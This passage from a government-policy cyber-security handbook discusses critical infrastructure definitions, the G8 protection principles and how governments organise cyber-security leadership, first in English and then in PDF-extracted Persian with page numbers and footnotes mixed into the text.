There is no fixed definition of the critical infrastructure groups, and the list of critical infrastructures used by policymakers differs from country to country and from time to time. The cyber-security strategy of the United States government, published in February 2003, identifies 13 critical infrastructure groups: 1) agriculture, 2) food, 3) water, 4) public health, 5) emergency services, 6) government, 7) defence industries, 8) information and telecommunications, 9) energy, 10) transport, 11) banking and finance, 12) chemicals and hazardous materials, and 13) postal services and shipping.[12] By comparison, Canada's critical infrastructure protection strategy names only six groups: 1) communications, 2) government, 3) energy and utilities, 4) services (which in Canada include financial services, food distribution and health), 5) security, and 6) transport.[13] Defining the critical infrastructures of a country is not as important as understanding the concept of critical infrastructures.[14]

The concept of critical infrastructures is important for many reasons. First, it helps to clarify why computer security matters. If policymakers understand that when computers fail, money in the banks cannot be paid out, trains cannot leave the station and even drinking water will not be pumped, they will be better able to grasp the effects of security problems. Second, infrastructure groups are important because they help to define the responsibilities of communities, and they bring into being communities of common interest that need to cooperate with one another in order to improve security. For example, those active in the electric power industry and government advisers can, by working together, play a positive role in removing the vulnerabilities of the power system. Computer security measures, including identifying best practices[15] and sharing information about vulnerabilities, can to some extent be applied within existing institutions and industry lines. In the private sector these institutions include trade associations, standards bodies and other bodies that oversee the various industries. In the public sector, most countries carry out cyber-security policies through ministries and regulatory agencies (such as those that have traditionally regulated the banking, telecommunications and energy sectors).

At present there are a number of large pioneering companies that cooperate in this area on a larger scale. For example, in May 2003 the G8 group identified 11 principles to be taken into account in developing a strategy for reducing the risk to critical information infrastructures.[16] These principles are as follows:

1. Countries should have emergency warning networks for cyber threats and incidents.
2. Countries should raise their level of awareness and knowledge so as to help people understand the nature and extent of their critical information infrastructure, and should define their role in protecting this information.
3. Countries should study their infrastructures and identify the interdependencies among them, and thereby enhance the protection of these infrastructures.
4. Countries should increase partnership between the public sector and the private sector, and should analyse and share their important infrastructure information so that they can prevent damage as far as possible and respond to damage that does occur.
5. Countries should create and maintain dedicated communication networks for times of crisis, and should test them to make sure that they remain secure and stable in emergency situations and can be used.
6. Countries should ensure that data availability[17] policies also take into account the security of critical information infrastructures.
7. Countries should facilitate the tracing of attacks on critical information infrastructures and, where appropriate, release the tracing information to other countries that request it.
8. Countries should conduct training and exercises to enhance their response capability, should test their plans for contingencies in the event of an attack, and should encourage everyone else to carry out similar activities.
9. Countries should ensure that they have adequate laws and acceptable procedures for dealing with security problems, and should coordinate these investigations with other countries in the best possible way - such as the laws adopted in the Council of Europe Cybercrime Convention[18] in November 2001 - and trained personnel should be made ready to assess and trace attacks on critical information infrastructures.
10. Countries should take part, where appropriate, in international cooperation to secure their critical information infrastructures, which includes establishing emergency warning systems, sharing and analysing information on vulnerabilities and incidents, and cooperating on attacks carried out against such infrastructures, while of course respecting domestic laws.
11. Countries should increase their national and international research and development and, on the basis of international standards, encourage the use of security technologies.

A unique characteristic of computer security is the interconnection among sectors - including similar and identical hardware and software - and the dependence on a shared communication network. Governments must therefore make policy in a way that ensures the sharing of information about vulnerabilities and solutions relevant to the infrastructure groups. This can be put into practice by designating a lead centre within government for the centralized coordination of cyber-security programmes and policies, and we will examine this subject later in this part.

[11] Critical Infrastructures
[12] The National Strategy to Secure Cyberspace [U.S.]
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
[13] Office of Critical Infrastructure Protection & Emergency Preparedness [Canada]
http://www.ocipep.gc.ca/home/index_e.asp
[14] For details of the responses of different countries to the issue of protecting critical infrastructures, see the book International Critical Information Infrastructure Protection Handbook. This book was produced at the Center for Security Studies and Conflict Research of the Swiss Federal Institute of Technology:
http://www.isn.ethz.ch/crn
[15] Best Practices
[16] For more information, see the following site:
http://www.cybersecuritycooperation.org/documents/G8_CIIP_Principles.pdf
[17] Data Availability
[18] Council of Europe Cybercrime Convention
Chapter Two
Protecting Government Systems

All of the topics that we examined in Part Three with regard to small and large organizations (SMEs) are also applicable to government systems. Just as companies need to protect themselves, their suppliers and their customers, the government must also protect its systems and citizens against physical threats and cyber-security threats. Local and national governments cannot prevent severe crises such as interruptions in computer operations, the loss of confidential data or the theft of computer resources. Publishing news of security incidents reduces public confidence and becomes an obstacle to the progress of e-government[19] initiatives. Therefore, as noted in the previous chapter, the government's first responsibility in computer security is usually "putting its own house in order"; meaning that government organizations at all levels (national, regional and local) must protect the computer systems that they use. This includes the computer systems used by government agencies or ministries, including the military and police forces, public health organizations, emergency response centres and central banks. Computer-dependent government infrastructures, depending on what is considered public and what is considered private, may include water systems, hydroelectric dams, air traffic control systems and other facilities.

Leadership and Organization

Setting up a national structure for computer security confronts the government with organizational challenges, including how this structure is to be led. To assign responsibilities within government, the following question must first be answered: from the standpoint of the economy, national security or governing regulations, is computer security considered a matter of importance?

To answer this question, it is worth knowing:

• Canada has allocated substantial funding for cyber security[20] to its Ministry of Defence.[21]
• In Britain, the Home Office,[22] which is responsible for law enforcement, holds the leadership.[23]
• The United States has placed this subject in its Department of Homeland Security, but has deliberately and consciously kept the Computer Security Division of the National Institute of Standards and Technology[24] under the supervision of the Department of Commerce.[25]
• Australia has created an e-security coordination group to coordinate cyber-security policy - an executive agency created by the National Office for the Information Economy and supervised by the Ministry of Communications and Information Technology.[26]
• Italy has set up an interministerial committee for the responsible use of the Internet, which is managed by the Department of Innovation and Technology in the Prime Minister's Office.
• In 2000, the Prime Minister of Japan created a group within the Cabinet to deal with information technology security, so as to coordinate security measures and policies better among ministers and agencies. This group consisted of experts who were members of the relevant agencies and ministries and of the private sector.[27]

The choice of where to locate e-security leadership within government is very important. For example, deciding when to release information about cyber-security vulnerabilities to the public requires many-sided consideration. Placing this responsibility in the Ministry of Defence, which is usually responsible for keeping national security secrets, may disrupt the release of information and result in too little material being published to raise public awareness. Since cooperation between the public sector and the private sector is an important component of what we believe to be the most effective computer security strategy, it may be better for cyber-security leadership to be placed in an economic agency or a government-affiliated body, under the supervision of the country's highest executive authority.

But more important than which agency or agencies should take responsibility for computer security is that some form of "national leadership" must be established to ensure that computer security receives sufficient attention from the components of government. When we think about introducing computer security into the existing ministries, important organizational questions arise, for which suitable answers must be found. If the only authority of the lead cyber-security agency is to persuade people and release information to the public, its practical authority over the security of other ministries will be limited. Methods must therefore be created that allow cyber-security leaders to establish security in the existing systems of agencies and ministries. One way to compel ministries to comply with computer security standards would be for a responsible official in the government's central security office to be able to reject the purchase orders of government agencies that have not complied with security standards.

The United States has adopted this approach to some extent, and has given the right to approve or reject capital expenditure on computer systems - on various considerations, including security issues - to the President's Office of Management and Budget. Another measure could be to require ministries and government agencies to carry out an annual cyber-security audit and report its results to the cyber-security office. Whatever structure is chosen, its senior manager must be appointed by the office of the President or the Prime Minister so that all departments and agencies take it seriously.

Another organizational challenge for government is the problem of human resources. Governments have difficulty attracting and retaining specialist staff in computer security. One solution could be to offer scholarships for computer security studies, under which individuals would commit to serving the government for a set number of years. A short-term solution could be a two-stage programme with private-sector participation, in which cyber-security specialists work for the government but all or part of their salary is paid by their private-sector employer. The human resources problem in cyber security, in both developed and developing countries, may confront the government with another fundamental problem, because the government, compared with the private sector, cannot pay specialists in this field substantial wages.

[19] E-Government
[20] Cyber-Security
[21] The Office of "Critical Infrastructure Protection and Emergency Preparedness" of Canada is a civilian organization that operates within the Ministry of National Defence.
[22] Home Office
[23] The UK Home Office has established a National Infrastructure Security Co-ordination Centre (NISCC) to work on critical infrastructure security issues, to provide warnings and the necessary assistance in response, and to facilitate relations between the public and private sectors for the protection of information. Within NISCC there is a computer security emergency centre named UNIRAS. There is also an Electronic Attack Response Group (EARG) within NISCC to help critical infrastructure organizations and government departments that are harmed by attacks. When attacks become possible, UNIRAS warns all organizations and companies in the UK. For more information on the UK government's approach, see the NISCC website:
http://www.niscc.gov.uk
[24] Computer Security Division of the National Institute of Standards & Technology
[25] In some respects the United States has a complex model for coordination, and it may not be a good model for developing countries. In the United States the "National Security Committee" is responsible for the security of computer systems in the public sector and the private sector, but the government's information security management centre has given responsibility for planning for government computer systems to the White House Office of Management and Budget, and the National Security Council in the White House is also responsible for coordinating cyber-security policymaking.
[26] Under Australian law, executive agencies are non-penal bodies, and when an agency's work spans the whole of government and it is somewhat independent of the government structure, it must be established by the highest local government official. The head of an executive agency is appointed by a minister - here the Minister for Communications and Information Technology - and is accountable only to that minister.
[27] For more information, see the following site:
http://www.kantei.go.jp/foreign/it/security/2000/0519taisei.html
‫ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬
‫ﺭﻭﻧﺪ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺑـﺰﺍﺭ ﻣـﺆﺛﺮﻱ‬
‫ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣـﺎﻟﻲ‬
‫ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻣﻠـﻲ ﭼﻴـﺴﺘﻨﺪ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﭼـﻪ‬
‫ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﺷﺪ‪ ،‬ﻭ ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺍﺻـﻼﺣﺎﺗﻲ ﺩﺭ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﻱ‬
‫ﺑﺎﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ‬
‫ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠـﺎ ﻋﻤـﺪﺗﹰﺎ‬
‫ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻋﻨﺎﺻﺮ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ‬
‫ﻣﻲﺷﻮﻳﻢ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻧـﺪ‪.‬‬
‫ﺩﺭ ﺍﺩﺍﻣــﺔ ﺑﺨــﺶ ﭼﻬــﺎﺭﻡ ﻧﻘــﺶ ﺩﻭﻟــﺖ ﺭﺍ ﺩﺭ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣــﻮﺭﺩ ﺑﺤــﺚ ﻭ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ‬
‫ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ‪ .‬ﻣﺮﻭﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺗﻮﺍﻧـﺪ ﻓﻮﺍﻳـﺪ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ‪:‬‬
‫ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭﺳـﻴﻌﺘﺮﻳﻦ ﻭ ﺑﻴـﺸﺘﺮﻳﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ‬
‫ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺩﺍﺷـﺘﻪ ﻭ ﺩﺭ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﻣﻄﺎﻟﺐ ﻭ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫ﻣﺸﺎﺑﻬﻲ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺟﺰﺋﻴـﺎﺕ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻭ‬
‫ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛـﺸﻮﺭ‬
‫ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ‪ ،‬ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﻣــﺸﺎﺑﻪ ﺭﻭﺷــﻲ ﺍﺳــﺖ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ‬
‫‪The National Strategy to Secure Cyberspace‬‬
‫]‪[U.S.‬‬
‫‪http://www.whitehouse.gov/pcipb‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪nal_Cyberspace_Strategy.pdf‬‬
‫‪28‬‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺧﻮﺩ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑﺮﺧـﻲ ﻋﻨﺎﺻـﺮ ﻭ‬
‫ﺑﺨﺸﻬﺎﻱ ﻣﺸﺘﺮﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪.۱‬‬
‫ﺍﺭﺯﻳــﺎﺑﻲ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻣﻠــﻲ ﻭ ﺍﻧﺘــﺸﺎﺭ ﮔﺰﺍﺭﺷــﻬﺎﻱ‬
‫ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺖ ﻣﻮﺿﻮﻉ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﻨﺪ ﻭ ﺑﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﻣﺮﺩﻡ ﺁﮔﺎﻫﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ؛‬
‫‪.۲‬‬
‫ﺍﻳﺠﺎﺩ ﺳﺎﺧﺘﺎﺭ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ؛‬
‫‪.۳‬‬
‫ﺗﻬﻴﺔ ﻳﻚ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﻣﻠﻲ ﺑـﺎ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﺑـﺎ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ؛‬
‫‪.۴‬‬
‫ﺗﻄﺒﻴﻖ ﻣﻘﺮﺭﺍﺕ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ‬
‫ﺍﺷﺘﺮﺍﻙ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻥ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ‪.‬‬
‫ﻓﺎﺯ ﺍﻭﻝ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﻔﺼﻞ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔـﺎﻫﻲ‬
‫ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﺳـﺘﺮﺍﻟﻴﺎ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۹۷‬ﮔﺰﺍﺭﺷـﻲ ﺗﺤـﺖ‬
‫ﻋﻨــﻮﺍﻥ ﺯﻳﺮﺳــﺎﺧﺖ ﺍﻃﻼﻋــﺎﺕ ﻣﻠــﻲ ﺍﺳــﺘﺮﺍﻟﻴﺎ‪ :‬ﺗﻬﺪﻳــﺪﻫﺎ ﻭ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎ‪ ٣١‬ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﻛﻪ ﺗﻮﺳـﻂ‬
‫ﻫﻴــﺄﺕ ﻣــﺪﻳﺮﺓ ﺷــﺮﻛﺖ ‪ Defense Signals‬ﺗﻨﻈــﻴﻢ ﺷــﺪ‬
‫ﺧﻮﺍﻧﻨﺪﻩ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﺎﻧﺪ ﻛﻪ ﺟﺎﻣﻌﺔ ﺍﺳﺘﺮﺍﻟﻴﺎ ﻧﺴﺒﺖ ﺑﻪ‬
‫ﻧﻘﺎﺋﺺ ﻧﺴﺒﺘﹰﺎ ﺯﻳﺎﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳـﺖ ﻭ ﻧﻴـﺰ‬
‫ﻫﻴﭻ ﺳﺎﺧﺘﺎﺭ ﺭﺳﻤﻲ ﻭ ﻣﺸﺨـﺼﻲ ﺑـﺮﺍﻱ ﻫﻤـﺎﻫﻨﮕﻲ ﻭ ﺍﺟـﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺟﻬـﺖ ﺣﻔـﻆ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـﻲ ﻭﺟـﻮﺩ‬
‫‪۲۹‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﺷﻤﺎﺭﻩ ‪ ۱۷‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪http://www.kantei.go.jp/foreign/it/network/‬‬
‫‪priority-all/index.html‬‬
‫‪Australia's National Information Infrastructure:‬‬
‫‪Threats & Vulnerabilities‬‬
‫‪30‬‬
‫‪31‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺭﺣﺎﻝ‬
‫ﺭﺷﺪ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺁﻣﺎﺩﮔﻲ ﻻﺯﻡ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﺑﻌﻀﻲ‬
‫ﻣـــﻮﺍﺭﺩ ﺧـــﺎﺹ‪ ،‬ﭘﺎﺳـــﺦ ﺩﻭﻟـــﺖ ﻣﺮﻛـــﺰﻱ ﻣﻨﺎﺳـــﺒﺘﺮ ﻭ‬
‫ﻗﺎﺑﻞ ﻗﺒﻮﻝﺗﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻧﻈﺮ ﺩﺍﺧﻠﻲ‪ ،‬ﺗـﺪﺍﻭﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ‬
‫ﻧﻴﺎﺯﻣﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺳـﺎﻳﺒﺮ ﺧـﻮﺩ‬
‫ﺩﻭﻟﺖ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬـﺎ ﻭ‬
‫ﺧﺪﻣﺎﺕ ﺿﺮﻭﺭﻱ ﺁﻥ ﺍﺳـﺖ‪ .‬ﺍﺯ ﻧﻈـﺮ ﺧـﺎﺭﺟﻲ‪ ،‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺑﺎﻻﻱ ﺗﺒﺎﺩﻻﺕ ﻭ ﻣﻮﺍﻧـﻊ ﻗـﺎﻧﻮﻧﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻭﻗـﻮﻉ‬
‫ﻣﺸﻜﻼﺕ ﺑﺰﺭﮒ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻣﻲﺷﻮﻧﺪ؛ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﻭﻟـﺖ‬
‫ﺩﺭ ﻏﻴﺎﺏ ﻧﻴﺮﻭﻫﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ‬
‫ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻣﺸﻜﻼﺕ ﺑـﻪ ﻏﻴﺮﻗﺎﺑـﻞ ﺍﻧﺘـﺸﺎﺭ ﺷـﺪﻥ ﻣﻨـﺎﺑﻊ‬
‫ﺣﻴﺎﺗﻲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣـﻲﺍﻧﺠﺎﻣـﺪ‪ ،‬ﻧﻘـﺶ ﺩﻭﻟـﺖ ﺩﺭ‬
‫‪٢٨‬‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﻩ ﺭﻓﻊ ﻣﺸﻜﻼﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪".‬‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪ ٢٩.‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﺍﻣﻨﻴـﺖ ﻳـﻚ ﺟـﺰﺀ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺻـﻮﻝ ﺣﻘـﻮﻗﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴـﻪ ﭘـﻴﺶﻧـﻮﻳﺲ ﺑﺮﻧﺎﻣـﺔ ﻣﻠـﻲ ﺗﻮﺳـﻌﻪ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﮊﺍﭘـﻦ ﺩﺭ‬
‫ﻣــﺎﺭﺱ ‪ ۲۰۰۱‬ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣــﺔ ﺍﻭﻟﻮﻳــﺖﺑﻨــﺪﻱ‬
‫‪٣٠‬‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺧﻮﺩ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ e-Japan‬ﺗﺮﻛﻴﺐ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٣٨‬‬
‫ﻧﺪﺍﺭﺩ‪ ٣٢.‬ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌـﻪ ﺭﻭﻱ ﺍﻳـﻦ‬
‫ﻣﻮﺿــﻮﻉ ﺩﺭ ﺳــﺎﻝ ‪ ۱۹۹۶‬ﻫﻴــﺄﺗﻲ ﺑــﻪ ﻧــﺎﻡ ﻣﺠﻤــﻊ ﺣﻤﺎﻳــﺖ ﺍﺯ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‪ ٣٣‬ﻣﺘـﺸﻜﻞ ﺍﺯ ﺑﻌـﻀﻲ‬
‫ﻣﻘﺎﻣﺎﺕ ﺣﻘﻴﻘﻲ ﻭ ﺣﻘﻮﻗﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﻣﺠﻤﻊ ﻓﺎﻗﺪ ﻫﺮﮔﻮﻧﻪ‬
‫ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﻮﺩ ﻭ ﺳﺎﺧﺘﺎﺭ ﭘﺎﻳﺪﺍﺭ ﻭ ﺛﺎﺑﺘﻲ ﻧﺪﺍﺷـﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﮔــﺰﺍﺭﺵ‪ ،‬ﻣـﺼﺎﺣﺒﻪ ﻭ ﺗﺤﻘﻴــﻖ ﻓـﺮﺍﻫﻢ ﻛــﺮﺩ ﻭ‬
‫ﮔﺰﺍﺭﺷﻲ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛﻪ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ‪ ،‬ﻣﻘﺎﻣـﺎﺕ‬
‫ﺣﻘﻮﻗﻲ‪ ،‬ﺭﺳﺎﻧﻪﻫﺎﻱ ﺟﻤﻌﻲ ﻭ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ‪ .‬ﺍﻳـﻦ ﻫﻴـﺄﺕ‬
